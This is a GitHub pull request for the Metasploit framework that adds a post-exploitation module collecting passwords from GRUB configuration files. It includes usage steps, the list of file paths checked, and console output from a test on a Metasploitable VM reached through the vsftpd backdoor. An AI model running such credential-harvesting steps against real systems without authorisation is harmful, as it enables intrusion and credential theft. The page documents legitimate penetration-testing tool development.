Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

#11166 add gather grub passwords #12462

Merged
merged 2 commits into from Oct 21, 2019

Conversation

@taeber
Copy link
Contributor

taeber commented Oct 16, 2019

This change adds a post module to collect passwords from GRUB configuration files.

It should fix #11166.

Vulnerable Application

Any UNIX-like system with a shell or meterpreter session using GRUB.

Verification Steps

  1. Get a shell or meterpreter session on some host.
  2. Do: use post/multi/gather/grub_creds
  3. Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the session number you wish to run this one.
  4. Do: run
  5. If the system has readable GRUB configuration files containing a password, they will be printed out.

Options

  • FILENAME is a string that can be used to specify an additional file to check after the usual places.
  • VERBOSE is a boolean that, when set, will provide more details on what is being checked. (Note: this option is defined elsewhere in metasploit, but this module makes use of it.)

Scenarios

I tested against a Metasploitable 2 VM (running Ubuntu 8.04). After adding the line
password topscret to /boot/grub/menu.lst, I ran the post-exploit.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/gather/grub_creds 
msf5 post(multi/gather/grub_creds) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
msf5 post(multi/gather/grub_creds) > set SESSION 1
SESSION => 1
msf5 post(multi/gather/grub_creds) > run

[+] /boot/grub/menu.lst:password topsecret
[*] Grub configuration files found and checked: 1.
[*] Post module execution completed
msf5 post(multi/gather/grub_creds) > set VERBOSE true
VERBOSE => true
msf5 post(multi/gather/grub_creds) > set FILENAME /root/grub.cfg
FILENAME => /root/grub.cfg
msf5 post(multi/gather/grub_creds) > run

[*] Finding grub configuration files
[*] Checking /boot/grub/grub.conf
[*] /boot/grub/grub.conf not found or unreadable
[*] Checking /boot/grub/grub.cfg
[*] /boot/grub/grub.cfg not found or unreadable
[*] Checking /boot/grub/menu.lst
[+] /boot/grub/menu.lst:password topsecret
[*] Checking /etc/grub.conf
[*] /etc/grub.conf not found or unreadable
[*] Checking /etc/grub/grub.cfg
[*] /etc/grub/grub.cfg not found or unreadable
[*] Checking /etc/grub.d/00_header
[*] /etc/grub.d/00_header not found or unreadable
[*] Checking /mnt/sysimage/boot/grub.conf
[*] /mnt/sysimage/boot/grub.conf not found or unreadable
[*] Checking /mnt/boot/grub/grub.conf
[*] /mnt/boot/grub/grub.conf not found or unreadable
[*] Checking /rpool/boot/grub/grub.cfg
[*] /rpool/boot/grub/grub.cfg not found or unreadable
[*] Checking /root/grub.cfg
[*] /root/grub.cfg not found or unreadable
[*] Grub configuration files found and checked: 1.
[*] Post module execution completed
msf5 post(multi/gather/grub_creds) > 

I also verified it works through meterpreter.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions 2
[*] Starting interaction with 2...

meterpreter > run post/multi/gather/grub_creds 

[+] /boot/grub/menu.lst:password topsecret
[*] Grub configuration files found and checked: 1.
meterpreter > 

Standards

  • I ran Rubocop on the code and verified there were no problems.
  • msftidy reports [INFO] No CVE references found. Please check before you land! which I ignored since there is no CVE associated with this.
  • Code is licensed under the MSF's license (BSD-3-clause).
  • Documentation added.
@busterb busterb self-assigned this Oct 21, 2019
@busterb busterb added the module label Oct 21, 2019
@busterb busterb changed the title 11166 add gather grub passwords #11166 add gather grub passwords Oct 21, 2019
@busterb

This comment has been minimized.

Copy link
Member

busterb commented Oct 21, 2019

I can't say I've seen grub in practice on anything other than a Linux machine, but this looks reasonable. Thanks @taeber

busterb added a commit that referenced this pull request Oct 21, 2019
@busterb busterb merged commit c92ea2b into rapid7:master Oct 21, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@busterb

This comment has been minimized.

Copy link
Member

busterb commented Oct 21, 2019

Release Notes

This adds a post exploitation module for extracting credentials from a GRUB configuration file.

msjenkins-r7 added a commit that referenced this pull request Oct 21, 2019
@busterb busterb mentioned this pull request Oct 21, 2019
0 of 5 tasks complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.